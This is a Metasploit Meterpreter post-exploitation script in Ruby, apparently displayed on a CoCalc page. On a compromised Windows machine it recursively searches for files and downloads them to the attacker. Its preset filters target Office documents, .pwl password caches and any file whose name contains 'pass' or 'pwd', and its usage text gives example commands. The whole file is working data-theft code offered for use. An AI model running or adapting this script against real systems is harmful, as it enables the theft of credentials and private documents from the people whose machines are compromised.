CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
# If you'd like to improve this script, please try to port it as a post
4
# module instead. Thank you.
5
##
6

7

8
## Meterpreter script that recursively search and download
9
## files matching a given pattern
10
## Provided by Nicob <nicob [at] nicob.net>
11

12
##                 ==   WARNING   ==
13
## As said by mmiller, this kind of script is slow and noisy :
14
## http://www.metasploit.com/archive/framework/msg01670.html
15
## However, it can sometimes save your ass ;-)
16
##                 ==   WARNING   ==
17

18
# Filters
19
$filters = {
20
  'office' => '\.(doc|docx|ppt|pptx|pps|xls|xlsx|mdb|od.)$',
21
  'win9x'  => '\.pwl$',
22
  'passwd' => '(pass|pwd)',
23
}
24

25
@@opts = Rex::Parser::Arguments.new(
26
  "-h" => [ false,"Help menu." ]
27
)
28

29
def usage
30
  print_line "search_dwld -- recursively search for and download files matching a given pattern"
31
  print_line "USAGE: run search_dwld [base directory] [filter] [pattern]"
32
  print_line
33
  print_line "filter can be a defined pattern or 'free', in which case pattern must be given"
34
  print_line "Defined patterns:"
35
  print_line $filters.keys.sort.collect{|k| "\t#{k}"}.join("\n")
36
  print_line
37
  print_line "Examples:"
38
  print_line " run search_dwld"
39
  print_line "	=> recursively look for (MS|Open)Office in C:\\"
40
  print_line " run search_dwld %USERPROFILE% win9x"
41
  print_line "	=> recursively look for *.PWL files in the user home directory"
42
  print_line " run search_dwld E:\\\\ free '\.(jpg|png|gif)$'"
43
  print_line "	=> recursively look for pictures in the E: drive"
44
  print_line(@@opts.usage)
45
  raise Rex::Script::Completed
46
end
47

48
@@opts.parse(args) { |opt, idx, val|
49
  case opt
50
  when "-h"
51
    usage
52
  end
53
}
54

55
def scan(path)
56
  begin
57
    dirs = client.fs.dir.foreach(path)
58
  rescue ::Rex::Post::Meterpreter::RequestError => e
59
    print_error("Error scanning #{path}: #{$!}")
60
    return
61
  end
62

63
  dirs.each {|x|
64
    next if x =~ /^(\.|\.\.)$/
65
    fullpath = path + '\\' + x
66

67
    if client.fs.file.stat(fullpath).directory?
68
      scan(fullpath)
69
    elsif fullpath =~ /#{$motif}/i
70
      # Replace ':' or '%' or '\' by '_'
71
      dst = fullpath.tr_s(":|\%|\\", "_")
72
      dst = Rex::FileUtils.clean_path(::Dir.tmpdir + ::File::Separator + dst)
73
      print_line("Downloading '#{fullpath}' to '#{dst}'")
74
      client.fs.file.download_file(dst, fullpath)
75
    end
76
  }
77
end
78

79
#check for proper Meterpreter Platform
80
def unsupported
81
  print_error("This version of Meterpreter is not supported with this Script!")
82
  raise Rex::Script::Completed
83
end
84

85

86
unsupported if client.platform != 'windows'
87
# Get arguments
88
basedir = args[0] || "C:\\"
89
filter  = args[1] || "office"
90

91
# Set the regexp
92
if filter == 'free'
93
  if args[2].nil?
94
    raise "free filter requires pattern argument"
95
  end
96
  $motif = args[2]
97
else
98
  $motif = $filters[filter]
99
end
100

101
if $motif.nil?
102
  raise "Unrecognized filter"
103
end
104

105
# Search and download
106
scan(basedir)
107

108

109